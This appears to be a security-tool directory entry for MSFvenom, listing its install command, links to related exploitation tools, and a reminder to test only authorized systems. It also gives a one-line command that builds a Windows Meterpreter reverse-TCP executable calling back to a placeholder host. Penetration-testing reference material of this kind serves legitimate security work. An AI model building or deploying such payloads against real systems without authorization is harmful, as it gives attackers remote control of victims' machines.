MSFvenom
Exploitationkali · parrotPayload generator and encoder from the Metasploit project.
Install
sudo apt install metasploit-framework
Common commands
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe > shell.exe
Use only on systems you are authorized to test. Follow program scope.
Related tools
Metasploit Framework
featuredThe most widely used exploitation framework. Modules for exploits, payloads, and post-exploitation.
BeEF
Browser Exploitation Framework — client-side attack platform via hooked browsers.
SearchSploit
CLI search tool for Exploit-DB. Quickly find public exploits for known software versions.